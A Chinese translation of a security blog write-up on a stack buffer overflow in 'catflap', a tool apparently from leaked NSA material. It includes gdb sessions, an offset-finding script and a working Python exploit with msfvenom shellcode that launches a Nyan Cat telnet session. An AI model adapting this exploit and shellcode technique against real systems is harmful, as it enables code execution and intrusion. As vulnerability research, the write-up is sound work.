Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

【技术分享】我是如何利用NSA泄露的安全工具的漏洞在终端上玩转彩虹猫游戏的

0
0
【技术分享】我是如何利用NSA泄露的安全工具的漏洞在终端上玩转彩虹猫游戏的

2017-05-15 10:01:22

阅读:678次
点赞(0)
收藏




【技术分享】我是如何利用NSA泄露的安全工具的漏洞在终端上玩转彩虹猫游戏的

作者:shan66





【技术分享】我是如何利用NSA泄露的安全工具的漏洞在终端上玩转彩虹猫游戏的

翻译:shan66

预估稿费:200RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿


概述

最近,我正盘算着找些东东来砥砺一下自己的逆向技能。选谁呢?我们知道,在NSA被泄漏的工具中,有一个名为catflap的一个可执行文件(ELF):NSA工具……ELF格式……名为catflap……,听起来很有趣,好吧,那就选它了。

我启动了Radare2,开始逆向分析。后来,在0x08048a10处发现了一个函数,它似乎创建了一个“恶意缓冲区”,来故意造成溢出。经过分析之后,我发现这个函数本身有一个缓冲区溢出漏洞——缓冲区溢出漏洞利用代码中的缓冲区进行溢出。不仅如此,它还是我见过的最简单的缓冲区溢出漏洞。


漏洞披露

发现漏洞后,我选择了公开披露,因为即使我将其提交给供应商的话,我们想也不会得到响应。由于这个漏洞的严重程度很低,所以也就不必将时间浪费在取花哨的名字上面了。你觉得它值得拥有一个CVE编号吗?

说实话,我觉得这个“0day”漏洞的主要价值在于其滑稽性。到目前为止,我还没有听别人谈论过catflap中如此特殊的漏洞(实际上,catflap的任何漏洞都没听说过)。所以,即使在网上搜索“catflap exploit”也没用,因为catapap本身就是一个漏洞。

注意:如果有人早就发现该漏洞的话,请告诉我,那么第一个发现者的桂冠应该属于他们。


漏洞根源

在深入分析这个漏洞之前,让我们想想为什么会出现这个漏洞。

我认为有三种可能性:

1. 开发者是个白痴

这个溢出漏洞是非常明显的,或者至少对于任何漏洞利用代码开发者来说,是显而易见的。然而,对一个不称职的开发人员来说,难免会错误百出。但是,将对手视为白痴是非常危险的。更可能的情况是,开发人员根本不在乎这个溢出漏洞到底有多么“露骨”。

2. 开发者不走心

这是最有可能的。有人可能认为这个漏洞与C语言缺乏边界检查脱不了干系。该漏洞出现在命令行选项中。如果攻击者希望通过RCE攻击方程式,那么他必须说服方程式成员使用奇怪的参数来运行catflap——看起来参数就像shellcode一样可怕,前提是如果你可以设法让方程式运行带有自己的shellcode的秘密工具的话。但是这种利用方式弱爆了,一个漏洞利用开发者为什么会浪费时间搞这种漏洞呢?

3. 该工具具有双重目的

我很喜欢这个想法,但这真的只是臆测而已。在一个被攻陷的机器上,你可能期待发现一些病毒和漏洞利用代码;漏洞利用代码可以用来攻击其他机器,而病毒则可以维持对本机器的长期控制。两者有很大的区别!那么,如果catflap合二为一呢? Catapap可以通过溢出可靠地加载任意shellcode。这实际上就是一个从哪方面看都像是漏洞利用代码的病毒注入器。当你发现一些东西看起来像一个漏洞利用代码,闻起来像一个漏洞利用代码,并且运行起来也像一个漏洞利用代码的时候,这意味着你在网络上横向渗透要比感染本地机器要更加困难。

虽然这是一个巧妙的想法,但我怀疑这并非catflap的初衷。catflap显然利用了/ bin / login中已知的溢出漏洞。这可能是一个古董级别的漏洞,以防万一。ELF中的其他细微线索表明,开发人员对内存管理并不十分谨慎,这意味着它可能是第二个备选项。也就是说,即使不用它,catflap仍然有可能可靠地运行任意shellcode,我们将在后面看到。所以,如果你在一个攻陷的机器上发现了catapap,不要有“愚蠢的黑客,我们不使用Solaris”等想法,要知道catflap可能被用作病毒,以维持对本地机器的长期访问。


漏洞分析

好的,我们现在开始对这个漏洞进行详细的分析。在0x08048a10处的函数似乎构建了一个用于Solaris漏洞利用的“恶意缓冲区”。它接受的参数之一(ebp + 0x10)是用户提供的、可在Solaris机器上运行的命令。这个用户的命令通过strdup(@ 0x08048a3e)复制到堆中。这样,就可以引用返回的堆指针cmd_dup了。0x8048c00处的循环将以空格字符(0x20,0x09)来分割cmd_dup字符串。

为了简单起见,我们用python给出相应的实现代码:

>>>cmd="ls-l\t/"#commandprovidedbyuser >>>exploded_cmd=cmd.split()#theloopsplitsthecommandonwhitespace >>>exploded_cmd ['ls','-l','/']

如果使用c语言的话,它就不是那么简单了,因为用于分隔的循环需要用空字节替换每个空白符(0x20和0x09)。然后,下一次迭代时需要仔细检查下一个字节是不是空白字符,然后在ebp-0x228数组中附加一个指针,指示其类型。我们称这个ebp-0x228数组为exploded_cmd。explosive_cmd数组显然位于堆栈上(从ebp引用),但是在写入数据之前,分隔循环不会检查数组的大小。这意味着通过提供一个含有大量空白分隔字符的命令字符串,exploit_cmd将把堆栈填充到更高的内存位置,最终覆盖保存的返回地址。

循环完成后,会检查用于终止expanding_cmd数组的空指针是否被破坏。如果被破坏的话,该函数会打印“Command string has too many tokens”并返回。


漏洞利用

这里我想要做的事情是,让catapap在终端玩彩虹猫——这就是我的目标。

这个漏洞的利用不仅非常简单,而且特别稳定。我们无法直接控制被覆盖的返回地址,但这并不重要。返回地址将被指向我们的缓冲区的指针所覆盖!而这个缓冲区已经位于堆中。因此,就算是启用了NX和ASLR安全措施,也会被成功绕过。即便对数组的结尾是否已损坏进行检测,也无法防御这种漏洞利用技术。因为在检查时,返回地址已被覆盖。不仅如此,检查失败不会调用exit(-1),而是返回!

运行shellcode很容易,我们只需要借助偏移量即可。寻找相应偏移量的最简单的方法,只需通过一个包含由空格分隔的单字符组成的大缓冲区来运行该程序,然后查看程序返回的位置。

为此,可以使用以下脚本(offset.py):

l=[] #remember0x20and0x09arebadchars foriinxrange(0x21,0xff): l.append(chr(i)) print"".join(l)

在gdb中启动catflap并在函数的返回(0x08049186)处上设置一个断点:

$gdb-qcatflap (gdb)b*0x08049186 Breakpoint1at0x8049186 (gdb)runasdf"$(pythonoffset.py)" Startingprogram:/tmp/catflapasdf"$(pythonoffset.py)" Commandstringhastoomanytokens Breakpoint1,0x08049186in??() (gdb)x/3i$eip =>0x8049186:ret 0x8049187:mov%esi,%esi 0x8049189:lea0x0(%edi,%eiz,1),%edi (gdb)ni 0x0804c116in??() (gdb)x/3bx$eip 0x804c116:0xa80x000x78 (gdb)x/100bx$eip-30 0x804c0f8:0x990x000x9a0x000x9b0x000x9c0x00 0x804c100:0x9d0x000x9e0x000x9f0x000xa00x00 0x804c108:0xa10x000xa20x000xa30x000xa40x00 0x804c110:0xa50x000xa60x000xa70x000xa80x00 0x804c118:0x780x780x780x780x200x780x780x20 0x804c120:0x780x780x780x780x780x780x780x78 0x804c128:0x5c0x310x300x5c0x340x5c0x330x30 0x804c130:0x310x5c0x310x360x200x780x200x78 0x804c138:0x200x780x200x780x200x780x200x78 0x804c140:0x200x780x200x780x200x780x200x78 0x804c148:0x200x780x200x780x200x780x200x5c 0x804c150:0x0a0x780x200x780x200x780x200x78 0x804c158:0x200x780x200x78

在x / 100bx $ eip-30命令中,我们看到每个偶数字节都是递增的,而每个奇数字节都为空。这意味着我们位于缓冲区中。在x / 3bx $ eip命令中,我们看到我们所在的字节是0xa8。我们的offset.py脚本是从0x21处的字节(以避免空白符)开始的,所以我们通过0xa8-0x21得到0x87。也就是说,我们的shellcode前面,是由空白符分隔的0x87个字符。

我们首先用下面的代码来仔细检查一下偏移量:

$catoffset.py l=[] foriinxrange(0x87): l.append("Z") l.append("BBBB") print"".join(l) $gdb-qcatflap Readingsymbolsfrom/tmp/catflap...(nodebuggingsymbolsfound)...done. (gdb)b*0x08049186 Breakpoint1at0x8049186 (gdb)runasdf"$(pythonoffset.py)" Startingprogram:/tmp/catflapasdf"$(pythonoffset.py)" Commandstringhastoomanytokens Breakpoint1,0x08049186in??() (gdb)ni 0x0804c116in??() (gdb)x/5bx$eip 0x804c116:0x420x420x420x420x00

我们到达了第一个“B”(0x42),所以我们只需要把shellcode放在那里,就可以让代码执行了。我们到哪里下载Nyan Cat shellcode呢? 当然是Metasploit!为此,我们只需要运行命令“telnet nyancat.dakko.us”即可。Metasploit的msfvenom有一个“linux / x86 / exec”有效载荷,可以执行telnet命令。当在命令行中运行它时,可以使用ASCII编码器使其更加漂亮。

注意:不要忘记坏字节。空字节实际上是允许的,因为我们可以用0x20替换它,程序会把它变成一个0x00。不过,这有可能把偏移量搞砸,所以最好避免使用。

$cat~/exploit.py #!/usr/bin/python importsys #telnetnancat #>msfvenom-plinux/x86/exec-b'\x20\x09'-vshellcode-fpythonCMD="telnet nyancat.dakko.us"-ex86/alpha_mixed #Noplatformwasselected,choosingMsf::Module::Platform::Linuxfromthepayload #NoArchselected,selectingArch:x86fromthepayload #Found1compatibleencoders #Attemptingtoencodepayloadwith1iterationsofx86/alpha_mixed #x86/alpha_mixedsucceededwithsize179(iteration=0) #x86/alpha_mixedchosenwithfinalsize179 #Payloadsize:179bytes #Finalsizeofpythonfile:972bytes shellcode="" shellcode+="\x89\xe1\xda\xcb\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a" shellcode+="\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43" shellcode+="\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41" shellcode+="\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" shellcode+="\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x62" shellcode+="\x4a\x46\x6b\x51\x48\x4a\x39\x73\x62\x35\x36\x33" shellcode+="\x58\x74\x6d\x31\x73\x6c\x49\x69\x77\x50\x68\x56" shellcode+="\x4f\x61\x63\x73\x58\x75\x50\x43\x58\x36\x4f\x50" shellcode+="\x62\x71\x79\x30\x6e\x6c\x49\x79\x73\x51\x42\x79" shellcode+="\x78\x42\x38\x47\x70\x77\x70\x75\x50\x52\x54\x31" shellcode+="\x75\x70\x6c\x70\x6e\x31\x75\x44\x34\x75\x70\x50" shellcode+="\x6e\x51\x69\x30\x61\x30\x6e\x33\x53\x63\x51\x71" shellcode+="\x64\x74\x6e\x30\x64\x53\x51\x72\x4b\x32\x4b\x50" shellcode+="\x6f\x64\x6e\x72\x55\x74\x33\x55\x50\x42\x77\x76" shellcode+="\x33\x6f\x79\x48\x61\x38\x4d\x4d\x50\x41\x41" l=[] foriinxrange(0x87): l.append("A") l.append(shellcode) if(len(sys.argv)==1): print"".join(l) else: printrepr("".join(l))

最后执行:

$./catflapasdf"$(python~/exploit.py)"

或者:

$python~/exploit.pya 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA \x89\xe1\xda\xcb\xd9q\xf4ZJJJJJJJJJJJCCCCCC7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIbJFkQHJ9sb563Xtm1slIiwPhVOacsXuPCX6OPbqy0nlIysQByxB8GpwpuPRT1uplpn1uD4upPnQi0a0n3ScQqdtn0dSQrK2KPodnrUt3UPBwv3oyHa8MMPAA' $./catflapa"$(printf'AAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA \x89\xe1\xda\xcb\xd9q\xf4ZJJJJJJJJJJJCCCCCC7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIbJFkQHJ9sb563Xtm1slIiwPhVOacsXuPCX6OPbqy0nlIysQByxB8GpwpuPRT1uplpn1uD4upPnQi0a0n3ScQqdtn0dSQrK2KPodnrUt3UPBwv3oyHa8MMPAA')"

具体效果,请看下面的视频:


【技术分享】我是如何利用NSA泄露的安全工具的漏洞在终端上玩转彩虹猫游戏的


【技术分享】我是如何利用NSA泄露的安全工具的漏洞在终端上玩转彩虹猫游戏的
【技术分享】我是如何利用NSA泄露的安全工具的漏洞在终端上玩转彩虹猫游戏的
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:https://www.hurricanelabs.com/blog/overflow-exploit-catflap-zero-day

Viewing all articles
Browse latest Browse all 12749

Latest Images

Trending Articles





Latest Images